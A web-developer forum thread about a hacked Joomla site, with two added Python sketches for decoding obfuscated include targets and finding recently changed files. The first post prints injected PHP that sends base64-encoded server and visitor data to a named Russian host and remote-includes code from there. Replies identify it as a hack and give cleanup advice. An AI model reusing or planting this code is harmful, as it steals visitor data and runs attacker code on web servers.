Parse error, syntax error

vlastanovak
Forum Newbie
Posts: 2
Joined: Fri Jun 26, 2009 3:05 pm

Parse error, syntax error

Post by vlastanovak »

Hi guys,

I've not had any problems in the past and my site has been operational for months - I also haven't made any changes to my site in weeks. BUT all of a sudden I am getting the following error message when trying to access my Joomla installation:

Parse error: syntax error, unexpected '"', expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/ausnzcla/public_html/libraries/joomla/environment/uri.php on line 741

So I have isolated the line and the line is:

$regex = "<^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>";

Does anyone have any idea where the error is?

SITE URL:ausnzclancentral . com See next post!!

Thanks.
icesolid
Forum Regular
Posts: 502
Joined: Mon May 06, 2002 9:36 pm
Location: Buffalo, NY

Re: Parse error, syntax error

Post by icesolid »

Please re-post this with [code][/code] so I can read your code better.
McInfo
DevNet Resident
Posts: 1532
Joined: Wed Apr 01, 2009 1:31 pm

Re: Parse error, syntax error

Post by McInfo »

WARNING: Do not run the script posted above and do not click on the link.

You have been hacked! The script is attempting to send your server variables to a Russian site, behgazzazbzefa.users.phpinclude.ru. Fortunately, the hacker was sloppy and edited the script in a way that causes a parse error, so it is possible that the edited script has never run and none of your users' IP addresses have been sent to the hacker's site. Unfortunately, you have a security hole that allowed the hacker to change your files.

Reinstall Joomla or restore uri.php by replacing it with a clean copy. Download Joomla here. Save the hacked copy for forensic evidence. Find the security hole.

Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 12:31 pm, edited 1 time in total.
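
The injected line hides its include target behind base64_decode() calls, and that can be undone statically without executing any of the PHP. The Python sketch below is an added example, not part of the original thread; the function names are illustrative and the sample input, with a placeholder host, is constructed.

```python
import base64
import re

# base64_decode("...") with a literal argument, as used in the injected line.
B64_CALL = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
# include/require followed by a concatenation of string literals and variables.
INCLUDE = re.compile(
    r'\b(?:include|require)(?:_once)?\b\s*\(?\s*'
    r'((?:"[^"]*"|\'[^\']*\'|\$\w+|\s|\.)+)')
TOKEN = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\$\w+)')
REMOTE = re.compile(r'(?i)^(?:https?|ftp)://')

def _decode(match):
    """Swap base64_decode("<literal>") for the decoded text as a PHP string."""
    try:
        text = base64.b64decode(match.group(2)).decode("latin-1")
    except ValueError:
        return match.group(0)  # not valid base64: leave the call untouched
    return match.group(0) if '"' in text else '"' + text + '"'

def resolve_includes(php_source):
    """Return [(resolved_target, is_remote)] for each include/require found.

    Variables are kept as {$name}; their values are only known at run time.
    """
    flat = B64_CALL.sub(_decode, php_source)
    found = []
    for m in INCLUDE.finditer(flat):
        parts = [dq or sq or ("{%s}" % var if var else "")
                 for dq, sq, var in TOKEN.findall(m.group(1))]
        target = "".join(parts)
        if target:
            found.append((target, bool(REMOTE.match(target))))
    return found

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample modelled on the posted line; the host is a placeholder.
SAMPLE = (
    '<?php $q = base64_encode($_SERVER["HTTP_HOST"]);\n'
    'include_once(base64_decode("' + _b64("http://") + '")."stage"'
    '.base64_decode("' + _b64(".example.invalid") + '")."/?".$q);\n'
    'require_once "lib/helper.php"; ?>'
)

if __name__ == "__main__":
    for target, remote in resolve_includes(SAMPLE):
        print("REMOTE" if remote else "local ", target)
```

Any include that resolves to a URL is worth treating as an indicator, since stock CMS files load their code from local paths.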
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Parse error, syntax error

Post by Eric! »

That's a strange place in the code to put in a hack (source in link).
http://api.joomla.org/__filesource/fsou ... i.php.html

I would assume you might have other hidden hacks in your site as well.

One hole in Joomla itself is a serious admin password hack in 1.5.0 and fixed recently in 1.5.6.
http://www.website-ideas.co.uk/2009/02/ ... joomla-15/
vlastanovak
Forum Newbie
Posts: 2
Joined: Fri Jun 26, 2009 3:05 pm

Re: Parse error, syntax error

Post by vlastanovak »

So what would you advise I do? Can I re-install Joomla without losing my DB data or template?
McInfo
DevNet Resident
Posts: 1532
Joined: Wed Apr 01, 2009 1:31 pm

Re: Parse error, syntax error

Post by McInfo »

Your database should not be affected by reinstalling the scripts, but make a backup just in case. I have not worked with Joomla, so I don't know how its installer operates (I'm assuming it has one).

You should be able to make a copy-backup of your template and put it back in the templates folder after reinstalling Joomla. However, your template files may have also been compromised by the attack. So, if you can, install a clean copy of the template.

Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 12:31 pm, edited 1 time in total.
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Parse error, syntax error

Post by Eric! »

Joomla may not have been how they got in either. Check the file date on uri.php and look for other files with similar change/mod times...assuming the hacker was sloppy. Also check your raw log files for suspicious access to your site. Change all your passwords too. If your database had unencrypted passwords you need to get your users to change them as the database could have been copied.

It wouldn't hurt to notify your host of the details as they are sometimes willing to help analyze and monitor your account. Sometimes attacks can come from users sharing the host server with you and they found a way into your files.
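
The modification-time check suggested above can be scripted: take the known-bad file as a reference and list everything else in the web root that changed around the same moment. This Python sketch is an added example, not part of the original thread; the one-hour window, the regex indicator and the demo tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumed indicator: include/require whose argument starts with base64_decode(.
SUSPECT = re.compile(
    rb"\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\s*\(", re.I)

def modified_near(root, reference, window=3600):
    """List files under root changed within `window` seconds of `reference`.

    Returns (relative_path, seconds_from_reference, has_suspect_include),
    sorted by how close each mtime is to the reference file's mtime.
    """
    ref = os.path.realpath(reference)
    ref_mtime = os.stat(ref).st_mtime
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or os.path.realpath(path) == ref:
                continue
            delta = os.stat(path).st_mtime - ref_mtime
            if abs(delta) <= window:
                with open(path, "rb") as fh:
                    flagged = bool(SUSPECT.search(fh.read()))
                hits.append((os.path.relpath(path, root), int(delta), flagged))
    return sorted(hits, key=lambda h: abs(h[1]))

def demo():
    """Constructed tree: a known-bad file, two neighbours, one old file."""
    t0 = 1_245_000_000  # arbitrary constructed timestamp
    files = {
        "libraries/uri.php": (t0, b"<?php include_once(base64_decode('AAAA')); ?>"),
        "templates/index.php": (t0 + 40, b"<?php require(base64_decode('AAAA').$x); ?>"),
        "images/logo.png": (t0 + 90, b"\x89PNG"),
        "index.php": (t0 - 30 * 86400, b"<?php echo 'ok'; ?>"),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (mtime, body) in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
            os.utime(path, (mtime, mtime))
        return modified_near(root, os.path.join(root, "libraries/uri.php"))

if __name__ == "__main__":
    for rel, delta, flagged in demo():
        print(f"{delta:+6d}s  {'SUSPECT' if flagged else '       '}  {rel}")
```

Modification times can be reset by whoever wrote the file, so an empty result does not clear the site; compare against a clean copy of the release as well.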